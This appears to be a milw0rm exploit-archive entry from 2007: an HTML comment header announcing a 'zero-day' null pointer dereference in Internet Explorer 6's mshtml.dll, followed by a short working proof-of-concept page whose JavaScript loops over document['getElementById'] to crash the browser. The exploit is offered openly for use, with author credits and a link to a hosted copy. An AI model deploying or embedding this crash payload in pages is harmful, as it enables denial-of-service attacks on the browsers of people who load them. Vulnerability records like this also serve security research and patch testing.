40 lines
No EOL
1.3 KiB
HTML
40 lines
No EOL
1.3 KiB
HTML
<!--
|
|
+ Title: Microsoft Internet Explorer Malformed HTML Null Pointer Dereference Vulnerability (mshtml.dll) (0-day)
|
|
|
|
+ Bug discovered & exploit coded by AmesianX in powerhacker.net (YoungHo Park - amesianx@gmail.com)
|
|
|
|
+ Critical: Critical
|
|
|
|
+ Impact: MS Internet Explorer 6 -> Crash (Denial of Service)
|
|
|
|
+ Where: From remote
|
|
|
|
+ Tested Operating System: Windows XP SP2 FULL PATCHED (Korean Language)
|
|
Windows 2000 Advanced Server (Korean Language)
|
|
|
|
+ Tested Software: Microsoft Internet Explorer Ver.6.0.2800.1106;SP1 (Windows 2000 Advanced Server)
|
|
Microsoft Internet Explorer Ver.6.0.2900.2180.xpsp.050928-1517;SP2 (Windows XP Pro)
|
|
|
|
+ Solution: Not Patched (zero-day)
|
|
|
|
+ Description:
|
|
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched
|
|
Windows XP SP2 system. this bug will crash when executing a 'for' scripts.
|
|
|
|
+ The following proof-of-concept is also available:
|
|
http://www.powerhacker.net/exploit/IE_NULL_CRASH.html
|
|
-->
|
|
|
|
<html>
|
|
<head>
|
|
<title> AmesianX, RC_No1 in powerhacker.net (amesianx@gmail.com, RC_No1@gmail.com)</title>
|
|
</head>
|
|
<body>
|
|
<script language='javascript'>
|
|
var data = document['getElementById'];
|
|
for(var key in data);
|
|
</script>
|
|
</body>
|
|
</html>
|
|
|
|
# milw0rm.com [2007-02-05] |